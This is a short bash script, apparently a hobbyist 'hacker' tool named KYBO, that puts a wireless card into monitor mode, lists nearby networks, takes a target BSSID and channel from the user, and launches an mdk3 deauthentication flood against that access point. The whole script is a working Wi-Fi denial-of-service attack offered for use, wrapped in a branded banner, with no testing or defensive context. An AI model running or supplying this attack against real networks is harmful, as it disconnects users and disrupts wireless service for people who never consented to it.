#!/usr/bin/env bash


#============================================================================================================
#	
#	Welcome To H4CK3R Script
#	H4CK3R Script By : Mr. H4CK3R
#	=======================================
#	My Facebook Account ::-
#	http://facebook.com/AriR.Abdulla
#	=======================================
#	My Youtube Channel ::-
#	https://www.youtube.com/channel/UCdigZ3N0EVMIEsS4hlIaaHg
#
#============================================================================================================


#This colour

	BlueF='\e[1;34m'
	magenta='\e[1;35m'
    cyan='\e[0;36m'
    green='\e[0;34m'
    okegreen='\033[92m'
    lightgreen='\e[1;32m'
    white='\e[1;37m'
    red='\e[1;31m'
    yellow='\e[1;33m'

#Checking...
if [ $(id -u) -ne 0 ] ; then
echo -e "$red" && echo "[x] This Script Must Be Run As Root!" && echo "" && exit 0
fi
resize -s 34 80


# ctrl_c
trap ctrl_c INT
ctrl_c() {
	echo "" && echo -e $BlueF" [$white"*"$BlueF]$red  Exiting ..." && sleep 0.2
	echo -e $BlueF" [$white"*"$BlueF]$red  GoodBye!"
	exit 0
}

# Title
printf '\033]2;KYBO \a'

##################
######START#######
kybo()
{
cd && cd /root/Desktop
airmon-ng start wlan0
gnome-terminal -x airodump-ng wlan0mon
echo -n -e "$cyan  Wich One (BSSID) -$white "
read bssid
if [ -z "$bssid" ]; then
	echo ""	
 				echo -n -e $red"  Do you want exit?$cyan ( Yes / No ) : " ;tput sgr0
					read back
						if [ -z "$back" ]; then
							exit
							fi
						if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
												then
													echo "" && echo -e $BlueF" [$white"*"$BlueF]$red  Exiting ..." && sleep 0.2
                                                 	echo -e $BlueF" [$white"*"$BlueF]$red  GoodBye!"
	                                                exit 0
										elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
												then
												clear
                                                kybo
	fi
fi
echo -n -e "$cyan  Channel -$white "
read ch
if [ -z "$ch" ]; then
	echo ""	
 				echo -n -e $red"  Do you want exit?$cyan ( Yes / No ) : " ;tput sgr0
					read back
						if [ -z "$back" ]; then
							exit
							fi
						if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
												then
													echo "" && echo -e $BlueF" [$white"*"$BlueF]$red  Exiting ..." && sleep 0.2
                                                 	echo -e $BlueF" [$white"*"$BlueF]$red  GoodBye!"
	                                                exit 0
										elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
												then
												clear
                                                kybo
	fi
fi
echo -n -e "$cyan  Name File -$white "
read nm
if [ -z "$nm" ]; then
	echo ""	
 				echo -n -e $red"  Do you want exit?$cyan ( Yes / No ) : " ;tput sgr0
					read back
						if [ -z "$back" ]; then
							exit
							fi
						if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
												then
													echo "" && echo -e $BlueF" [$white"*"$BlueF]$red  Exiting ..." && sleep 0.2
                                                 	echo -e $BlueF" [$white"*"$BlueF]$red  GoodBye!"
	                                                exit 0
										elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
												then
												clear
                                                kybo
	fi
fi
echo $bssid > $nm
echo ""
mdk3 wlan0mon d -b $nm -c $ch
}
##################
#######END########






##################
##################
BF()
{
clear && echo "" && echo -e "$BlueF"
echo -e $white"                  ▄█   ▄█▄ ▄██   ▄   ▀█████████▄   ▄██████▄  "
echo -e $BlueF"                 ███ ▄███▀ ███   ██▄   ███    ███ ███    ███ "
echo -e $white"                 ███▐██▀   ███▄▄▄███   ███    ███ ███    ███ "
echo -e $red"                ▄█████▀    ▀▀▀▀▀▀███  ▄███▄▄▄██▀  ███    ███ "
echo -e $white"               ▀▀█████▄    ▄██   ███ ▀▀███▀▀▀██▄  ███    ███ "
echo -e $BlueF"                 ███▐██▄   ███   ███   ███    ██▄ ███    ███ "
echo -e $white"                 ███ ▀███▄ ███   ███   ███    ███ ███    ███ "
echo -e $red"                 ███   ▀█▀  ▀█████▀  ▄█████████▀   ▀██████▀  "
echo -e $cyan"                 ▀                                           "
echo ""
echo -e "$white                    .======================================."
echo -e "$white                    |--------- Author: Mr. H4CK3R ---------|"
echo -e "$white                    |--------- FB.com/AriR.Abdulla --------|"
echo -e "$white                    '======================================'"
echo "" && echo "" && echo "" && echo -e "$green" && sleep 0.9
kybo
}
##################
##################


BF
